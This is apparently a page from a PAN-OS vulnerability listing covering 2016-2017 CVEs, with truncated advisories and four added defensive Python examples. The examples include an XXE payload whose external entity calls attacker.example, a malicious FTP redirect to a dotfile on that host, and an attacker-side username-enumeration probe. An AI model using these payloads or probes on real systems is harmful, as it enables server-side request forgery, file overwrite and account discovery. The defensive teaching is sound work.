Paloalto PAN-OS vulnerabilities
300 known vulnerabilities affecting paloalto/pan-os.
Total CVEs: 300
CISA KEV: 19 (actively exploited)
Public exploits: 32
Exploited in wild: 18
Severity breakdown: CRITICAL 53, HIGH 115, MEDIUM 119, LOW 13
Vulnerabilities
Page 11 of 15
CVE-2017-15940 | CRITICAL | CVSS 9.8 | 2017-12-06
CVE-2017-15940 [CRITICAL] CWE-77 Command Injection in PAN-OS
A vulnerability exists in the PAN-OS web interface packet capture management that could allow an authenticated user to inject arbitrary commands. (Ref # PAN-81892 / CVE-2017-15940)
PAN-OS contains a vulnerability that may allow for post-authentication command injection.
This issue affects PAN-OS 6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier, PAN-OS 8.0.6 and earlier.
Affected produ
paloalto
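Every entry on this page states its affected range in the same shape ("PAN-OS 7.0.18 and earlier" for a ceiling on one release train, a bare "PAN-OS 6.1" for a whole train), so the first thing a practitioner wants is a triage check against the version a firewall actually runs. The following is an added example written for this page, not code from Palo Alto Networks or from the listing site; the two `AFFECTS_*` strings are copied from the CVE-2017-15940 and CVE-2017-3731 entries, and the treatment of the "-hN" hotfix suffix is an assumption noted in the code.

```python
import re
from typing import List, Optional, Tuple

# Affected-version statements copied from the advisories on this page.
AFFECTS_CVE_2017_15940 = ("PAN-OS 6.1.18 and earlier, PAN-OS 7.0.18 and earlier, "
                          "PAN-OS 7.1.13 and earlier, PAN-OS 8.0.6 and earlier")
AFFECTS_CVE_2017_3731 = "PAN-OS 6.1, PAN-OS 7.0.14 and earlier, PAN-OS 7.1, PAN-OS 8.0"

# "PAN-OS 7.0.18 and earlier" -> ceiling on the 7.0 train; a bare "PAN-OS 6.1" -> whole train.
_AFFECTS_RE = re.compile(r"PAN-OS\s+(\d+)\.(\d+)(?:\.(\d+))?", re.IGNORECASE)
_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:-h\d+)?")


def parse_affects(text: str) -> List[Tuple[int, int, Optional[int]]]:
    """Return (major, minor, max_patch) per listed train; max_patch None means every release."""
    ceilings = []
    for major, minor, patch in _AFFECTS_RE.findall(text):
        ceilings.append((int(major), int(minor), int(patch) if patch else None))
    return ceilings


def parse_version(version: str) -> Tuple[int, int, int]:
    """Parse a running version such as '8.0.6' or '8.0.6-h2'.

    Assumption (not from the advisory): the '-hN' hotfix suffix is ignored, i.e. a
    hotfix build is treated as its base release. That is the conservative choice: a
    hotfix only counts as a fix when the advisory's Solution line names it.
    """
    m = _VERSION_RE.fullmatch(version.strip())
    if not m:
        raise ValueError(f"unrecognised PAN-OS version: {version!r}")
    major, minor, patch = (int(g) for g in m.groups())
    return major, minor, patch


def is_affected(version: str, affects: str) -> bool:
    """True when `version` falls inside one of the affected ranges in `affects`.

    Trains the advisory does not list (e.g. 8.1 for CVE-2017-15940) are reported as
    not affected, which is exactly what the advisory text says and no more.
    """
    major, minor, patch = parse_version(version)
    for a_major, a_minor, max_patch in parse_affects(affects):
        if (major, minor) == (a_major, a_minor) and (max_patch is None or patch <= max_patch):
            return True
    return False


if __name__ == "__main__":
    for v in ("7.1.13", "7.1.14", "8.0.6-h1", "8.1.0"):
        state = "AFFECTED" if is_affected(v, AFFECTS_CVE_2017_15940) else "not affected"
        print(f"CVE-2017-15940 on PAN-OS {v}: {state}")
```

Note that 7.1.13 is inside "7.1.13 and earlier" while 7.1.14 is not, and that for CVE-2017-3731 any 6.1.x release matches the bare "PAN-OS 6.1" train. Run the check against the output of `show system info` on the firewall rather than against a CMDB entry, which is where stale versions usually hide.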
CVE-2017-15942 | HIGH | CVSS 7.5 | 2017-12-06
CVE-2017-15942 [HIGH] CWE-399 Denial of Service Against GlobalProtect
A vulnerability exists in PAN-OS that could allow an attacker to deny access to the GlobalProtect portal or GlobalProtect gateway, or to prevent configuration commits. (Ref # PAN-78127 / CVE-2017-15942)
PAN-OS contains a vulnerability in GlobalProtect that may allow a non-authenticated third party to mount a Denial of Service attack against the GlobalProtect portal, GlobalProtect gateway or preventing c
CVE-2017-15943 | MEDIUM | CVSS 5.3 | 2017-12-06
CVE-2017-15943 [MEDIUM] CWE-918 Server-Side Request Forgery in PAN-OS
A vulnerability exists in the PAN-OS web interface in the configuration file import for applications, spyware and vulnerability objects. Exploitation of this vulnerability allows for the parsing of external entities and could lead a PAN-OS device to connect to and disclose limited information to the attacker's server. (Ref # PAN-80452 / CVE-2017-15943)
PAN-OS contains a vulnerability that
CVE-2017-9458 | CRITICAL | CVSS 9.8 | 2017-08-30
CVE-2017-9458 [CRITICAL] CWE-611 XML External Entity (XXE) in PAN-OS
A vulnerability exists in PAN-OS's GlobalProtect internal and external gateway interface that could allow for an XML External Entity (XXE) attack, because PAN-OS does not properly parse XML input. (Ref # PAN-75688 / CVE-2017-9458)
Successful exploitation of this issue may allow disclosure of information, denial of service or server-side request forgery.
This issue affects PAN-OS 6.1.17 and earlier, PAN
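Both CVE-2017-15943 (external entities parsed during configuration import, leading to SSRF) and CVE-2017-9458 (XXE on the GlobalProtect gateway interface) come from the same root cause: an XML parser that honours a DOCTYPE supplied by the client. The fix on the parsing side is to refuse the DOCTYPE before any entity it declares can be processed, which rules out external entities (SSRF, file disclosure) and nested internal entities (expansion DoS) together. The following is an added example for this page using Python's stdlib expat bindings; it is not PAN-OS code, and the two XML inputs are constructed for illustration, not real GlobalProtect messages.

```python
import xml.parsers.expat as expat


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or entity declaration."""


# Constructed sample inputs (not real GlobalProtect messages).
BENIGN_XML = b'<?xml version="1.0"?><request><user>alice</user></request>'
XXE_PAYLOAD = (b'<?xml version="1.0"?>'
               b'<!DOCTYPE request [<!ENTITY probe SYSTEM "http://attacker.example/cb">]>'
               b'<request><user>&probe;</user></request>')


def parse_untrusted_xml(data: bytes) -> dict:
    """Parse XML with the stdlib expat parser, refusing any DOCTYPE before it can take effect.

    Without a DOCTYPE there can be no entity declarations, so neither external entities
    (SSRF, file disclosure) nor nested internal entities (entity-expansion DoS) are possible.
    Returns the root tag, the element names seen and the concatenated character data.
    """
    parser = expat.ParserCreate()
    result = {"root": None, "elements": [], "text": ""}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Fires as soon as <!DOCTYPE ...> is seen, before any <!ENTITY> inside it is processed.
        raise UnsafeXML(f"DOCTYPE refused (root={name!r}, SYSTEM={sysid!r})")

    def on_entity_decl(*_):
        # Defence in depth: never reached when on_doctype fires, but refuse entities regardless.
        raise UnsafeXML("ENTITY declaration refused")

    def on_start(tag, _attrs):
        if result["root"] is None:
            result["root"] = tag
        result["elements"].append(tag)

    def on_chars(text):
        result["text"] += text

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity_decl
    parser.StartElementHandler = on_start
    parser.CharacterDataHandler = on_chars
    parser.Parse(data, True)
    result["text"] = result["text"].strip()
    return result


def rejects_as_xxe(data: bytes) -> bool:
    """True when the parser refuses the document for carrying a DOCTYPE or entity declaration."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXML:
        return True
    return False


if __name__ == "__main__":
    print("benign:", parse_untrusted_xml(BENIGN_XML))
    print("payload rejected:", rejects_as_xxe(XXE_PAYLOAD))
```

The important property is that the refusal happens in the DOCTYPE callback, i.e. before the parser has had any opportunity to resolve `SYSTEM "http://attacker.example/cb"`; a check that inspects the parsed tree afterwards is too late, because the outbound request that constitutes the SSRF has already been made. On the detection side, a DOCTYPE in a client-supplied XML body to a VPN gateway or management interface is rare enough to alert on outright.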
CVE-2017-12416 | MEDIUM | CVSS 6.1 | 2017-08-30
CVE-2017-12416 [MEDIUM] CWE-79 Cross-Site Scripting in PAN-OS
A vulnerability exists in PAN-OS's GlobalProtect internal and external gateway interface that could allow for a cross-site scripting (XSS) attack, because PAN-OS does not properly validate specific request parameters. (Ref # PAN-76003 / CVE-2017-12416)
Successful exploitation of this issue may allow an attacker to inject arbitrary JavaScript or HTML.
This issue affects PAN-OS 6.1.17 and earlier, PAN-OS
CVE-2017-6460 | HIGH | CVSS 8.8 | 2017-07-27
CVE-2017-6460 [HIGH] CWE-119 NTP Vulnerability
The Network Time Protocol (NTP) library has been found to contain a vulnerability CVE-2017-6460. Palo Alto Networks software makes use of the vulnerable library and may be affected. This issue only affects the management plane of the firewall. (Ref # PAN-76130 / CVE-2017-6460)
Successful exploitation of this issue requires an attacker to have network access to the management interface.
This issue affects PAN-OS 6.1, PAN-OS 7.0.17 and earlier, PAN-
CVE-2017-8390 | CRITICAL | CVSS 9.8 | 2017-07-20
CVE-2017-8390 [CRITICAL] CWE-20 Vulnerability in the PAN-OS DNS Proxy
A Remote Code Execution vulnerability exists in the PAN-OS DNS Proxy. This issue affects customers who have DNS Proxy enabled in PAN-OS, and it affects both the Data and Management planes of the firewall. When DNS Proxy processes a specially crafted fully qualified domain name (FQDN), it is possible to execute code on the firewall. (Ref # PAN-77516 / CVE-2017-8390)
Successful exploi
CVE-2017-9459 | MEDIUM | CVSS 6.1 | 2017-07-20
CVE-2017-9459 [MEDIUM] CWE-79 Cross-Site Scripting in the Management Web Interface
An unauthenticated reflected cross-site scripting (XSS) vulnerability exists in the management web interface of PAN-OS. (Ref # PAN-76455 / CVE-2017-9459)
Successful exploitation of this issue may allow an attacker to inject arbitrary Java scr
CVE-2017-9467 | MEDIUM | CVSS 6.1 | 2017-07-20
CVE-2017-9467 [MEDIUM] CWE-79 Cross-Site Scripting in PAN-OS
A vulnerability exists in the PAN-OS GlobalProtect external interface that could allow for a cross-site scripting (XSS) attack, because PAN-OS does not properly validate specific request parameters. (Ref # PAN-77294 / CVE-2017-9467)
Successful exploitation of this issue may allow an attacker to inject arbitrary JavaScript or HTML.
This issue affects PAN-OS 6.1.17 and earlier, PAN-OS 7.0.15 and earlier, PAN-OS 7
CVE-2016-10229 | CRITICAL | CVSS 9.8 | 2017-06-19
CVE-2016-10229 [CRITICAL] CWE-358 Kernel Vulnerability
A vulnerability exists in the Linux kernel of PAN-OS that may result in Remote Code Execution: a flaw in the kernel's UDP networking code could enable an attacker to execute arbitrary code within the context of the kernel. The Data Plane (DP) of PAN-OS is not affected by this issue since it does not use the vulnerable Linux kernel code. (Ref # PAN-77173 / CVE-2016-10229)
Successful exploitation of
CVE-2016-8610 | HIGH | CVSS 7.5 | 2017-06-07
CVE-2016-8610 [HIGH] CWE-400 OpenSSL Vulnerability
The OpenSSL library has been found to contain vulnerability CVE-2016-8610. Palo Alto Networks software makes use of the vulnerable library and may be affected. (Ref # PAN-68543 / CVE-2016-8610)
The OpenSSL library in use by PAN-OS is patched on a regular basis.
This issue affects PAN-OS 6.1.17 and earlier, PAN-OS 7.0.15 and earlier, PAN-OS 7.1.10 and earlier
Affected products: PAN-OS
Solution: PAN-OS 6.1.18 and later, PA
CVE-2016-4971 | HIGH | CVSS 8.8 | PoC | 2017-05-23
CVE-2016-4971 [HIGH] CWE-254 WGET Vulnerability
wget has been found to contain a vulnerability (CVE-2016-4971): it allows a remote server to write to arbitrary files by redirecting an HTTP request to a crafted FTP resource. Palo Alto Networks software makes use of the vulnerable component and may be affected. (Ref # PAN-59677 / CVE-2016-4971)
Successfully exploiting this issue would require an attacker to be authenticated on the Management Interface.
This issue
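The wget bug above is a client-side redirect-handling failure: the download name was taken from the path of the URL the redirect chain ended on, so a server that answered an HTTP request with a Location pointing at an FTP resource chose both the scheme and the local filename. The added example below contrasts that naming rule with a hardened one and enforces a redirect scheme policy; it is illustration code written for this page, not wget's or PAN-OS's implementation, and the "no HTTPS to HTTP downgrade" rule is a policy choice of the example rather than anything the advisory states.

```python
import posixpath
from urllib.parse import urljoin, urlsplit


class RedirectRefused(Exception):
    pass


# Policy (an assumption of this example, not wget's or PAN-OS's): only HTTP(S) may be
# followed, and a redirect may never drop from HTTPS to HTTP.
ALLOWED_SCHEMES = {"http", "https"}


def vulnerable_output_name(final_url: str) -> str:
    """The pre-fix behaviour described in the advisory: the local file is named after the
    path of the URL the redirect chain ends on, so a malicious server picks the filename."""
    return posixpath.basename(urlsplit(final_url).path) or "index.html"


def resolve_redirect(original_url: str, location: str) -> str:
    """Resolve a Location header against the request URL and enforce the scheme policy."""
    target = urljoin(original_url, location)
    orig_scheme = urlsplit(original_url).scheme.lower()
    new_scheme = urlsplit(target).scheme.lower()
    if new_scheme not in ALLOWED_SCHEMES:
        raise RedirectRefused(f"redirect from {orig_scheme} to {new_scheme} refused: {target}")
    if orig_scheme == "https" and new_scheme == "http":
        raise RedirectRefused(f"HTTPS to HTTP downgrade refused: {target}")
    return target


def safe_output_name(original_url: str, fallback: str = "index.html") -> str:
    """Name the local file after the URL the caller asked for, never the redirect target,
    and keep only the last path component so a server cannot steer the write elsewhere."""
    name = posixpath.basename(urlsplit(original_url).path)
    if name in ("", ".", ".."):
        return fallback
    return name


def refuses_redirect(original_url: str, location: str) -> bool:
    """True when the redirect policy blocks following `location` from `original_url`."""
    try:
        resolve_redirect(original_url, location)
    except RedirectRefused:
        return True
    return False


if __name__ == "__main__":
    # Constructed scenario: an update fetch is answered with a redirect to an FTP dotfile.
    asked_for = "http://updates.example/pkg.tgz"
    location = "ftp://attacker.example/.bash_profile"
    print("old naming rule would write:", vulnerable_output_name(location))
    print("hardened client refuses redirect:", refuses_redirect(asked_for, location))
    print("hardened client would have written:", safe_output_name(asked_for))
```

The two checks are independent and both are worth keeping: the scheme policy stops the cross-protocol hop the advisory describes, and deriving the filename from the original URL means that even a permitted redirect cannot turn a download into a write of `.bash_profile` or another file the server names.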
CVE-2016-5696 | MEDIUM | CVSS 4.8 | 2017-05-23
CVE-2016-5696 [MEDIUM] CWE-200 Kernel Vulnerability
A vulnerability exists in the kernel of PAN-OS that may result in Information Disclosure. The challenge ACK rate limiting in the kernel's networking subsystem may allow an off-path attacker to infer certain information about a given connection by saturating the global challenge ACK rate-limit counter and then measuring the change with probe packets. (Ref # PAN-62500 / CVE-2016-5696)
Successful exploitation of
CVE-2017-7945 | CRITICAL | CVSS 9.8 | 2017-04-28
CVE-2017-7945 [CRITICAL] CWE-209 Brute force attack on the PAN-OS GlobalProtect external interface
A vulnerability exists in the PAN-OS GlobalProtect external interface that could allow an attacker to brute force usernames on the GlobalProtect external interface. The vulnerability is caused by PAN-OS returning different responses to login attempts, which lets an attacker distinguish valid usernames from invalid ones. (Ref # PAN-72769 / CVE-2017-7945)
Successful exploitation of
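CWE-209 in a login handler is easy to introduce and easy to test for. The added example below, written for this page and not taken from PAN-OS or Palo Alto Networks, shows a login routine with the response pattern the advisory describes beside a hardened one that answers identically (and does the same hashing work) whether or not the account exists, plus the attacker-side probe that turns the difference into a username list. The credential store and usernames are constructed for the example.

```python
import hashlib
import hmac
import os
from collections import Counter

# Constructed credential store (not a PAN-OS structure): username -> (salt, PBKDF2 hash).
_ITERATIONS = 20_000


def _derive(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


_SALT = os.urandom(16)
USERS = {"alice": (_SALT, _derive("correct horse battery", _SALT))}
# Dummy record used for unknown users so the hashing cost is paid on every attempt,
# which closes the timing side of the same oracle.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _derive("unused", _DUMMY_SALT)

GENERIC = "Invalid username or password"


def vulnerable_login(username: str, password: str) -> str:
    """The response pattern the advisory describes: the message (and the work done)
    differs depending on whether the username exists."""
    record = USERS.get(username)
    if record is None:
        return "Unknown user"                      # leaks: no such account
    salt, expected = record
    if _derive(password, salt) != expected:
        return "Invalid password"                  # leaks: account exists
    return "OK"


def hardened_login(username: str, password: str) -> str:
    """Same message and same hashing cost whether or not the username exists."""
    salt, expected = USERS.get(username, (_DUMMY_SALT, _DUMMY_HASH))
    ok = hmac.compare_digest(_derive(password, salt), expected)
    if ok and username in USERS:
        return "OK"
    return GENERIC


def enumerate_usernames(login, candidates, probe_password: str = "definitely-wrong") -> set:
    """Attacker's side of CWE-209: try one wrong password per candidate and return the
    candidates whose response differs from the common case (those are real accounts)."""
    responses = {u: login(u, probe_password) for u in candidates}
    baseline, _count = Counter(responses.values()).most_common(1)[0]
    return {u for u, r in responses.items() if r != baseline}


if __name__ == "__main__":
    candidates = ["admin", "alice", "bob", "operator"]
    print("leaked by vulnerable handler:", enumerate_usernames(vulnerable_login, candidates))
    print("leaked by hardened handler:", enumerate_usernames(hardened_login, candidates))
```

When testing a real portal the same clustering is done over (status code, body length, response time) rather than over a message string, because the differing response is often a redirect target or a few bytes of length rather than a different error text. Pair the uniform response with per-source rate limiting; the generic message stops enumeration but does nothing by itself against password spraying.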
CVE-2017-7644 | MEDIUM | CVSS 6.5 | 2017-04-28
CVE-2017-7644 [MEDIUM] CWE-200 Information Disclosure in the Management Web Interface
A vulnerability exists in the Management Web Interface of PAN-OS that could allow for Information Disclosure: the Management Web Interface does not properly validate certain permissions. (Ref # PAN-70541 / CVE-2017-7644)
Successfully exploiting this issue would require an attacker to be authenticated.
This issu
CVE-2017-3731 | HIGH | CVSS 7.5 | 2017-04-20
CVE-2017-3731 [HIGH] CWE-125 OpenSSL Vulnerability
The OpenSSL library has been found to contain vulnerability CVE-2017-3731. Palo Alto Networks software makes use of the vulnerable library and may be affected. (Ref # PAN-73914 / CVE-2017-3731)
The OpenSSL library in use by PAN-OS is patched on a regular basis.
This issue affects PAN-OS 6.1, PAN-OS 7.0.14 and earlier, PAN-OS 7.1, PAN-OS 8.0
Affected products: PAN-OS
Solution: PAN-OS 7.0.15 and later; PAN-OS 7.1.10 and l
CVE-2017-7409 | MEDIUM | CVSS 6.1 | 2017-04-20
CVE-2017-7409 [MEDIUM] CWE-79 Cross-Site Scripting in PAN-OS
A vulnerability exists in the PAN-OS GlobalProtect external interface that could allow for a cross-site scripting (XSS) attack, because PAN-OS does not properly validate specific request parameters. (Ref # PAN-70674 / CVE-2017-7409)
Successful exploitation of this issue may allow an attacker to inject arbitrary JavaScript or HTML.
This issue affects PAN-OS 7.0.14 and earlier
Affected products: PAN-OS
Solution:
CVE-2017-7218 | HIGH | CVSS 7.8 | 2017-04-10
CVE-2017-7218 [HIGH] CWE-20 Local Privilege Escalation in the Management Web Interface
A vulnerability exists in the Management Web Interface that could allow for local privilege escalation. The Management Web Interface does not properly validate specific request parameters, which can potentially allow code execution with higher privileges. (Ref # PAN-70426 / CVE-2017-7218)
Successfully exploiting this issue would require an attacker to b
CVE-2017-7217 | MEDIUM | CVSS 4.3 | 2017-04-10
CVE-2017-7217 [MEDIUM] CWE-20 Tampering of temporary export files in the Management Web Interface
A vulnerability exists in the Management Web Interface that could allow an attacker to tamper with export files. The Management Web Interface does not properly validate specific request parameters, which can potentially allow arbitrary data to be written to export files. (Ref # PAN-70436 / CVE-2017-7217)
Successfully exploiting thi
CVE-2017-7216 | MEDIUM | CVSS 6.5 | 2017-04-10
CVE-2017-7216 [MEDIUM] CWE-200 Information Disclosure in the Management Web Interface
A vulnerability exists in the Management Web Interface that could allow for Information Disclosure. The Management Web Interface does not properly validate specific request parameters which can potentially allow for Information Disclosure. (Ref # PAN-70434 / CVE-2017-7216)
Successfully exploiting this issue would require an attacker to be authenticated.
Th